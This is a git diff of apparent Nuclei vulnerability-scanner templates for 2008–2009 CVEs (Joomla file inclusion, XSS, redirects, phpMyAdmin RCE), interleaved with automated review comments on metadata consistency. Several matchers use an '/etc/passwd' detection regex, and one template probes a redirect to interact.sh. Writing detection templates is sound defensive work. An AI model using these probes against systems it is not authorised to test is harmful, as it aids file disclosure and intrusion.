a/http/cves/2008/CVE-2008-6080.yaml +++ b/http/cves/2008/CVE-2008-6080.yaml 
@@ -3,21 +3,24 @@ id: CVE-2008-6080 info: name: Joomla! ionFiles 4.4.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter. reference: - https://www.exploit-db.com/exploits/6809 - - http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/ - - http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6080 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46039 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6080 cwe-id: CWE-22 - tags: edb,cve,cve2008,joomla,lfi + epss-score: 0.00548 + cpe: cpe:2.3:a:codecall:com_ionfiles:4.4.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: codecall + product: com_ionfiles + tags: edb,cve,cve2008,joomla,lfi http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-6172.yaml b/http/cves/2008/CVE-2008-6172.yaml index a1f5eda655..296a03faed 100644 --- a/http/cves/2008/CVE-2008-6172.yaml +++ b/http/cves/2008/CVE-2008-6172.yaml 
@@ -3,21 +3,24 @@ id: CVE-2008-6172 info: name: Joomla! Component RWCards 3.0.11 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter. reference: - https://www.exploit-db.com/exploits/6817 - https://nvd.nist.gov/vuln/detail/CVE-2008-6172 - - http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/ - - http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/ + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46081 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2008-6172 cwe-id: CWE-22 - tags: cve2008,joomla,lfi,edb,cve + epss-score: 0.00367 + cpe: cpe:2.3:a:weberr:rwcards:3.0.11:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: weberr + product: rwcards + tags: cve2008,joomla,lfi,edb,cve http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-6222.yaml b/http/cves/2008/CVE-2008-6222.yaml index 68b4919f05..65cc03071a 100644 --- a/http/cves/2008/CVE-2008-6222.yaml +++ b/http/cves/2008/CVE-2008-6222.yaml 
@@ -3,21 +3,24 @@ id: CVE-2008-6222 info: name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. reference: - https://www.exploit-db.com/exploits/6980 - - http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/ - - http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/ - https://nvd.nist.gov/vuln/detail/CVE-2008-6222 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/46356 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6222 cwe-id: CWE-22 - tags: cve2008,joomla,lfi,edb,cve + epss-score: 0.00684 + cpe: cpe:2.3:a:joomlashowroom:pro_desk_support_center:1.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomlashowroom + product: pro_desk_support_center + tags: cve2008,joomla,lfi,edb,cve http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2008/CVE-2008-6465.yaml b/http/cves/2008/CVE-2008-6465.yaml index da9a1824d7..defd3ee5c7 100644 --- a/http/cves/2008/CVE-2008-6465.yaml +++ b/http/cves/2008/CVE-2008-6465.yaml 
@@ -12,14 +12,18 @@ info: - https://exchange.xforce.ibmcloud.com/vulnerabilities/45252 - https://nvd.nist.gov/vuln/detail/CVE-2008-6465 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.4 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6465 - cwe-id: CWE-80 + cwe-id: CWE-79 + epss-score: 0.00421 + cpe: cpe:2.3:a:parallels:h-sphere:3.0.0:p9:*:*:*:*:*:* metadata: max-request: 1 verified: true shodan-query: title:"Parallels H-Sphere + vendor: parallels + product: h-sphere tags: cve,cve2008,xss,parallels,h-sphere http: diff --git a/http/cves/2008/CVE-2008-6668.yaml b/http/cves/2008/CVE-2008-6668.yaml index 15d13e5608..6015b4e93e 100644 --- a/http/cves/2008/CVE-2008-6668.yaml +++ b/http/cves/2008/CVE-2008-6668.yaml @@ -3,21 +3,25 @@ id: CVE-2008-6668 info: name: nweb2fax <=0.2.7 - Local File Inclusion author: geeknik - severity: high + severity: medium description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. reference: - https://www.exploit-db.com/exploits/5856 - - http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804 - https://exchange.xforce.ibmcloud.com/vulnerabilities/43173 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/43172 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2008-6668 cwe-id: CWE-22 - tags: cve2008,nweb2fax,lfi,traversal,edb,cve + epss-score: 0.00359 + cpe: cpe:2.3:a:dirk_bartley:nweb2fax:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: dirk_bartley + product: nweb2fax + tags: cve2008,nweb2fax,lfi,traversal,edb,cve http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex part: body regex: 
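Review bot: The unchanged `shodan-query: title:"Parallels H-Sphere` line in the CVE-2008-6465 hunk has no closing quote as rendered here; YAML accepts it as a plain scalar, so nothing fails at load time, but the stored query would end mid-string and is not a usable Shodan filter. If the file matches this rendering the fix is `shodan-query: title:"Parallels H-Sphere"`.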
diff --git a/http/cves/2008/CVE-2008-6982.yaml b/http/cves/2008/CVE-2008-6982.yaml index 7939deffd8..e7c725f794 100644 --- a/http/cves/2008/CVE-2008-6982.yaml +++ b/http/cves/2008/CVE-2008-6982.yaml @@ -3,21 +3,26 @@ id: CVE-2008-6982 info: name: Devalcms 1.4a - Cross-Site Scripting author: arafatansari - severity: high + severity: medium description: | Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. reference: - https://www.exploit-db.com/exploits/6369 - http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download - https://nvd.nist.gov/vuln/detail/CVE-2008-6982 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/44940 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2008-6982 cwe-id: CWE-79 + epss-score: 0.0038 + cpe: cpe:2.3:a:devalcms:devalcms:1.4a:*:*:*:*:*:*:* metadata: max-request: 1 verified: true + vendor: devalcms + product: devalcms tags: cve,cve2008,devalcms,xss,cms,edb http: diff --git a/http/cves/2008/CVE-2008-7269.yaml b/http/cves/2008/CVE-2008-7269.yaml index 4b111acfa6..2a8fc8c9c3 100644 --- a/http/cves/2008/CVE-2008-7269.yaml +++ b/http/cves/2008/CVE-2008-7269.yaml @@ -10,15 +10,18 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2008-7269 - https://www.exploit-db.com/exploits/6823 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2008-7269 cwe-id: CWE-20 + epss-score: 0.03645 cpe: cpe:2.3:a:boka:siteengine:5.0:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: html:"SiteEngine" verified: "true" + vendor: boka + product: siteengine tags: cve,cve2008,redirect,siteengine http: diff --git a/http/cves/2009/CVE-2009-0347.yaml b/http/cves/2009/CVE-2009-0347.yaml index a22afd3e5f..dfce9670b5 100644 --- a/http/cves/2009/CVE-2009-0347.yaml 
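Review bot: The CVE-2008-7269 hunk keeps `verified: "true"` as a quoted string while the neighbouring templates in this diff (CVE-2008-6465, CVE-2008-6982, CVE-2009-1872) write `verified: true` as a boolean. A consumer that reads the field as a boolean sees a different type here, and the mixed form is out of place in a commit that otherwise normalises metadata; suggest `verified: true`.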
+++ b/http/cves/2009/CVE-2009-0347.yaml @@ -11,14 +11,18 @@ info: - https://www.exploit-db.com/exploits/32766 - https://www.kb.cert.org/vuls/id/202753 - https://exchange.xforce.ibmcloud.com/vulnerabilities/48336 + - http://sunbeltblog.blogspot.com/2009/01/constant-stream-of-ultraseek-redirects.html classification: - cvss-metrics: AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P cvss-score: 5.8 cve-id: CVE-2009-0347 cwe-id: CWE-59 + epss-score: 0.08272 cpe: cpe:2.3:a:autonomy:ultraseek:_nil_:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: autonomy + product: ultraseek tags: cve,cve2009,redirect,autonomy http: diff --git a/http/cves/2009/CVE-2009-0545.yaml b/http/cves/2009/CVE-2009-0545.yaml index 277a638723..ba3b74a6ea 100644 --- a/http/cves/2009/CVE-2009-0545.yaml +++ b/http/cves/2009/CVE-2009-0545.yaml @@ -10,14 +10,19 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 - http://www.zeroshell.net/eng/announcements/ - http://www.ikkisoft.com/stuff/LC-2009-01.txt + - http://www.vupen.com/english/advisories/2009/0385 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 - tags: edb,cve,cve2009,zeroshell,kerbynet,rce + epss-score: 0.9719 + cpe: cpe:2.3:a:zeroshell:zeroshell:1.0:beta1:*:*:*:*:*:* metadata: max-request: 1 + vendor: zeroshell + product: zeroshell + tags: edb,cve,cve2009,zeroshell,kerbynet,rce http: - method: GET diff --git a/http/cves/2009/CVE-2009-0932.yaml b/http/cves/2009/CVE-2009-0932.yaml index d5973114b7..14eae6c598 100644 --- a/http/cves/2009/CVE-2009-0932.yaml +++ b/http/cves/2009/CVE-2009-0932.yaml 
@@ -3,21 +3,26 @@ id: CVE-2009-0932 info: name: Horde/Horde Groupware - Local File Inclusion author: pikpikcu - severity: high + severity: medium description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. reference: - https://www.exploit-db.com/exploits/16154 - http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5 - - http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695 - https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2 + - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.413.2.5 + - http://cvs.horde.org/co.php/horde/docs/CHANGES?r=1.515.2.503 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N + cvss-score: 6.4 cve-id: CVE-2009-0932 cwe-id: CWE-22 - tags: cve,cve2009,horde,lfi,traversal,edb + epss-score: 0.04048 + cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: debian + product: horde + tags: cve,cve2009,horde,lfi,traversal,edb http: - method: GET @@ -26,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-1151.yaml b/http/cves/2009/CVE-2009-1151.yaml index 484fb306b4..7aa75206ad 100644 --- a/http/cves/2009/CVE-2009-1151.yaml +++ b/http/cves/2009/CVE-2009-1151.yaml 
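Review bot: The added `cpe: cpe:2.3:a:debian:horde:3.2:*:*:*:*:*:*:*` with `vendor: debian` and `product: horde` attributes Horde to Debian, which looks like the packaging distributor rather than the upstream vendor; the other templates in this diff take vendor from the upstream project (joomla, phppgadmin, cisco). If this is copied verbatim from an NVD CPE entry it is worth a comment, e.g. `# vendor follows the NVD CPE (Debian package); upstream is the Horde project`, so CPE-based inventory matching is not surprised by it.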
@@ -3,7 +3,7 @@ id: CVE-2009-1151 info: name: PhpMyAdmin Scripts - Remote Code Execution author: princechaddha - severity: critical + severity: high description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ @@ -12,13 +12,17 @@ info: - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php - https://nvd.nist.gov/vuln/detail/CVE-2009-1151 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-1151 - cwe-id: CWE-77 - tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce + cwe-id: CWE-94 + epss-score: 0.79256 + cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: phpmyadmin + product: phpmyadmin + tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce http: - raw: @@ -33,10 +37,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2009/CVE-2009-1496.yaml b/http/cves/2009/CVE-2009-1496.yaml index aaaa086510..7529af81a6 100644 --- a/http/cves/2009/CVE-2009-1496.yaml +++ b/http/cves/2009/CVE-2009-1496.yaml 
@@ -3,21 +3,24 @@ id: CVE-2009-1496 info: name: Joomla! Cmimarketplace 0.1 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: | Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. reference: - https://www.exploit-db.com/exploits/8367 - - http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/ - https://nvd.nist.gov/vuln/detail/CVE-2009-1496 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-1496 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00533 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-1558.yaml b/http/cves/2009/CVE-2009-1558.yaml index 5ac76beb15..1252fd6466 100644 --- a/http/cves/2009/CVE-2009-1558.yaml +++ b/http/cves/2009/CVE-2009-1558.yaml 
@@ -7,18 +7,22 @@ info: description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. reference: - https://www.exploit-db.com/exploits/32954 - - https://web.archive.org/web/20210119151410/http://www.securityfocus.com/bid/34713 - http://www.vupen.com/english/advisories/2009/1173 - http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/ - https://nvd.nist.gov/vuln/detail/CVE-2009-1558 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/50231 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:N/A:N + cvss-score: 7.8 cve-id: CVE-2009-1558 cwe-id: CWE-22 - tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb + epss-score: 0.00901 + cpe: cpe:2.3:h:cisco:wvc54gca:1.00r22:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco + product: wvc54gca + tags: cve,iot,linksys,camera,traversal,cve2009,lfi,cisco,firmware,edb http: - method: GET diff --git a/http/cves/2009/CVE-2009-1872.yaml b/http/cves/2009/CVE-2009-1872.yaml index 46f331128e..7d94fa369a 100644 --- a/http/cves/2009/CVE-2009-1872.yaml +++ b/http/cves/2009/CVE-2009-1872.yaml 
@@ -6,20 +6,23 @@ info: severity: medium description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. reference: - - https://web.archive.org/web/20201208121904/https://www.securityfocus.com/archive/1/505803/100/0/threaded - https://www.tenable.com/cve/CVE-2009-1872 - http://www.adobe.com/support/security/bulletins/apsb09-12.html - http://www.dsecrg.com/pages/vul/show.php?id=122 - https://nvd.nist.gov/vuln/detail/CVE-2009-1872 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2009-1872 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.3657 + cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.component:"Adobe ColdFusion" verified: true + vendor: adobe + product: coldfusion tags: cve,cve2009,adobe,xss,coldfusion,tenable http: @@ -30,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header diff --git a/http/cves/2009/CVE-2009-2015.yaml b/http/cves/2009/CVE-2009-2015.yaml index 31e65b4bdf..6b84b86d27 100644 --- a/http/cves/2009/CVE-2009-2015.yaml +++ b/http/cves/2009/CVE-2009-2015.yaml 
@@ -7,17 +7,20 @@ info: description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). reference: - https://www.exploit-db.com/exploits/8898 - - http://web.archive.org/web/20210121191105/https://www.securityfocus.com/bid/35259/ - http://www.vupen.com/english/advisories/2009/1530 - https://nvd.nist.gov/vuln/detail/CVE-2009-2015 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-2015 cwe-id: CWE-22 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00813 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET @@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-2100.yaml b/http/cves/2009/CVE-2009-2100.yaml index dbfbe32432..1c3fa42ae0 100644 --- a/http/cves/2009/CVE-2009-2100.yaml +++ b/http/cves/2009/CVE-2009-2100.yaml 
@@ -3,21 +3,23 @@ id: CVE-2009-2100 info: name: Joomla! JoomlaPraise Projectfork 2.0.10 - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. reference: - https://www.exploit-db.com/exploits/8946 - - http://web.archive.org/web/20210121191226/https://www.securityfocus.com/bid/35378/ - https://nvd.nist.gov/vuln/detail/CVE-2009-2100 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 cve-id: CVE-2009-2100 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi,edb + epss-score: 0.00528 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: cve,cve2009,joomla,lfi,edb http: - method: GET @@ -26,7 +28,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-3053.yaml b/http/cves/2009/CVE-2009-3053.yaml index a5acdedd1c..41261d1df7 100644 --- a/http/cves/2009/CVE-2009-3053.yaml +++ b/http/cves/2009/CVE-2009-3053.yaml 
@@ -3,21 +3,25 @@ id: CVE-2009-3053 info: name: Joomla! Agora 3.0.0b - Local File Inclusion author: daffainfo - severity: high + severity: medium description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. reference: - https://www.exploit-db.com/exploits/9564 - - https://web.archive.org/web/20210120183330/https://www.securityfocus.com/bid/36207/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/52964 - https://nvd.nist.gov/vuln/detail/CVE-2009-3053 + - http://www.exploit-db.com/exploits/9564 classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N - cvss-score: 8.6 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P + cvss-score: 6.8 cve-id: CVE-2009-3053 cwe-id: CWE-22 - tags: cve,cve2009,joomla,lfi,edb + epss-score: 0.00367 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: cve,cve2009,joomla,lfi,edb http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-3318.yaml b/http/cves/2009/CVE-2009-3318.yaml index 42bff805dc..69a50e0646 100644 --- a/http/cves/2009/CVE-2009-3318.yaml +++ b/http/cves/2009/CVE-2009-3318.yaml @@ -8,16 +8,19 @@ info: reference: - https://www.exploit-db.com/exploits/9706 - https://nvd.nist.gov/vuln/detail/CVE-2009-3318 - - https://web.archive.org/web/20210121192413/https://www.securityfocus.com/bid/36441/ - http://www.exploit-db.com/exploits/9706 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-3318 cwe-id: CWE-22 - cvss-score: 7.5 - tags: joomla,lfi,edb,cve,cve2009 + epss-score: 0.00706 + cpe: cpe:2.3:a:joomla:joomla:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla + tags: joomla,lfi,edb,cve,cve2009 http: - method: GET 
@@ -26,7 +29,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-4202.yaml b/http/cves/2009/CVE-2009-4202.yaml index 4506d120b6..a0fca2b616 100644 --- a/http/cves/2009/CVE-2009-4202.yaml +++ b/http/cves/2009/CVE-2009-4202.yaml @@ -9,15 +9,19 @@ info: - https://www.exploit-db.com/exploits/8870 - http://www.vupen.com/english/advisories/2009/1494 - https://nvd.nist.gov/vuln/detail/CVE-2009-4202 - - http://web.archive.org/web/20210121191031/https://www.securityfocus.com/bid/35201/ + - http://www.exploit-db.com/exploits/8870 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2009-4202 cwe-id: CWE-22 - tags: cve2009,joomla,lfi,photo,edb,cve + epss-score: 0.01956 + cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: joomla + product: joomla\! + tags: cve2009,joomla,lfi,photo,edb,cve http: - method: GET @@ -26,7 +30,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-4223.yaml b/http/cves/2009/CVE-2009-4223.yaml index 75b90a2844..72142f903b 100644 --- a/http/cves/2009/CVE-2009-4223.yaml +++ b/http/cves/2009/CVE-2009-4223.yaml @@ -13,12 +13,16 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2009-4223 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-4223 cwe-id: CWE-94 - cvss-score: 7.5 - tags: cve,cve2009,krweb,rfi,edb + epss-score: 0.01041 + cpe: cpe:2.3:a:gianni_tommasi:kr-php_web_content_server:*:beta_2:*:*:*:*:*:* metadata: max-request: 1 + vendor: gianni_tommasi + product: kr-php_web_content_server + tags: cve,cve2009,krweb,rfi,edb http: - method: GET @@ -27,10 +31,11 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: interactsh_protocol words: - "http" + + - type: status + status: + - 200 
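Review bot: The new `product: joomla\!` (and `cpe: cpe:2.3:a:joomla:joomla\!:*...`) in CVE-2009-4202 spells the same product differently from the `product: joomla` this commit adds to CVE-2009-2100 and CVE-2009-3053; CVE-2010-0157 carries the same `joomla\!` form. The backslash is the CPE 2.3 formatted-string escape for `!` and belongs inside the `cpe` value, but a YAML plain scalar keeps it literally, so the `product` metadata becomes the string `joomla\!`, and anything that filters or groups templates by vendor/product (presumably what these fields are for) will see two distinct products. Suggest normalising the metadata to `product: joomla` and leaving the escape only in the cpe string.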
diff --git a/http/cves/2009/CVE-2009-4679.yaml b/http/cves/2009/CVE-2009-4679.yaml index d48847253f..db07ceb35c 100644 --- a/http/cves/2009/CVE-2009-4679.yaml +++ b/http/cves/2009/CVE-2009-4679.yaml @@ -13,12 +13,16 @@ info: - http://www.exploit-db.com/exploits/10754 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P + cvss-score: 7.5 cve-id: CVE-2009-4679 cwe-id: CWE-22 - cvss-score: 7.5 - tags: cve,cve2009,joomla,lfi,nexus,edb + epss-score: 0.00826 + cpe: cpe:2.3:a:inertialfate:com_if_nexus:1.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: inertialfate + product: com_if_nexus + tags: cve,cve2009,joomla,lfi,nexus,edb http: - method: GET @@ -27,7 +31,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" diff --git a/http/cves/2009/CVE-2009-5020.yaml b/http/cves/2009/CVE-2009-5020.yaml index 9e2b35ad95..b544b386e4 100644 --- a/http/cves/2009/CVE-2009-5020.yaml +++ b/http/cves/2009/CVE-2009-5020.yaml @@ -10,19 +10,24 @@ info: - http://awstats.sourceforge.net/docs/awstats_changelog.txt remediation: Apply all relevant security patches and product upgrades. classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:P + cvss-score: 5.8 cve-id: CVE-2009-5020 - cwe-id: CWE-601 - tags: cve,cve2009,redirect,awstats + cwe-id: CWE-20 + epss-score: 0.00215 + cpe: cpe:2.3:a:awstats:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: awstats + product: awstats + tags: cve,cve2009,redirect,awstats http: - method: GET path: - '{{BaseURL}}/awstats/awredir.pl?url=interact.sh' - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=interact.sh' + stop-at-first-match: true matchers: - type: regex diff --git a/http/cves/2009/CVE-2009-5114.yaml b/http/cves/2009/CVE-2009-5114.yaml index 3ff0aa3991..94bc2f0b89 100644 --- a/http/cves/2009/CVE-2009-5114.yaml +++ b/http/cves/2009/CVE-2009-5114.yaml 
